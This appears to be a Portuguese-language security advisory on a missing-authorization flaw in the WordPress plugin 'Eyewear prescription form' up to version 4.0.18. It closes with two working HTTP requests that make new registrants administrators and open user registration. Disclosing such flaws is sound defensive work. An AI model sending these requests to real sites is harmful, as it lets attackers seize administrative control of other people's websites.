
Formulário de prescrição de óculos <= 4.0.18 - Falta de autorização para atualização arbitrária de opções sem autenticação
Formulário de receita de óculos <= 4.0.18 - Autorização ausente para atualização arbitrária de opções não autenticada
O plugin Eyewear prescription form para WordPress é vulnerável a modificação não autorizada de dados que pode levar à escalada de privilégios devido à falta de verificação de capacidade na função adminSetting() em todas as versões até, e incluindo, 4.0.18. Isso possibilita que atacantes não autenticados atualizem opções arbitrárias no site WordPress. Isso pode ser aproveitado para atualizar a função padrão para registro como administrador e habilitar o registro de usuários para que atacantes obtenham acesso de usuário administrativo a um site vulnerável.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1